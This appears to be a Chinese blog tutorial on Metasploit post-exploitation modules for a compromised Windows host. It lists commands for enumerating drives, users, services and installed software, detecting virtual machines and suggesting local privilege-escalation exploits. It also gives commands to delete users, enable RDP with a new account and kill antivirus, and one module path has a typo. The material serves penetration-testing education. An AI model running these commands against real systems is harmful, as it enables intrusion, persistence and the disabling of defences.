Metasploit -- 后渗透模块(POST)

简介: Metasploit -- 后渗透模块(POST)

作用:获取目标主机后shell后,继续信息收集,提权


1、获取目标分区情况


run post/windows/gather/forensics/enum_drives


0a2653c851af460fa595bd959398a8f1.png


2、检测是否是虚拟主机


run post/windows/gather/checkvm


0eacb84100b54626af849e6b562bf92a.png


3、获取当前安装的应用程序


run post/windows/gather/enum_applications


2d65d23f6d4748949b924e4057485923.png


4、获取用户登录信息


run post/windows/gather/enum_logged_on_users


2e9b90b2ca334476abebe75bafe6eeaa.png


5、对目标进行漏洞扫描


run post/multi/recon/local_exploit_suggester


4cebaac233b3433da32a72337a77fc60.png


6、收集系统环境信息


run post/multi/gather/env


6de278e6d6694ce5bb08e7e842b7e74b.png


7、查看开启的服务


run post/windows/gather/enum_services


7a399525ddec4b77923c464820b33738 (1).png


8、查看目标主机最近的操作


run post/windows/gather/dumplinks


7a399525ddec4b77923c464820b33738.png


9、其他操作


删除用户


run post/wndows/manage/delete_user username=aiyou


添加账户


run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou


关闭杀软


windows/manage/killav


禁止非法,后果自负


目录
相关文章
|
安全 Python
python——脚本实现检测目标ip是否存在rce漏洞
python——脚本实现检测目标ip是否存在rce漏洞
437 0
python——脚本实现检测目标ip是否存在rce漏洞
|
2月前
|
SQL 安全 测试技术
Kali下Sqlmap工具使用方法之POST方法篇
Kali下Sqlmap工具使用方法之POST方法篇
|
6月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
129 0
|
6月前
|
关系型数据库 MySQL 数据库
Metasploit -- 辅助模块(Auxiliary)
Metasploit -- 辅助模块(Auxiliary)
107 0
|
6月前
|
数据安全/隐私保护
BurpSuite2021 -- Intruder模块
BurpSuite2021 -- Intruder模块
109 2
|
6月前
Appscan10.0.4 -- PowerTools
Appscan10.0.4 -- PowerTools
61 0
|
测试技术
[笔记]渗透测试工具Burpsuit《二》Proxy模块介绍以及使用
[笔记]渗透测试工具Burpsuit《二》Proxy模块介绍以及使用
|
存储 SQL XML
Burpsuite入门之target模块攻防中利用
1. 可以用来收集目标站点的更多资产 2. 可以探测一些自动加载的接口、内容等,有的内容并不能被访问者直接看见,通过抓包的方式就可以一目了然。
1028 2
Burpsuite入门之target模块攻防中利用
|
安全 PHP
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
ctf.show 萌新模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用 passthru()
248 0
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
|
安全 Linux PHP
WEB常见漏洞之命令执行(靶场篇)
WEB常见漏洞之命令执行(靶场篇)
500 0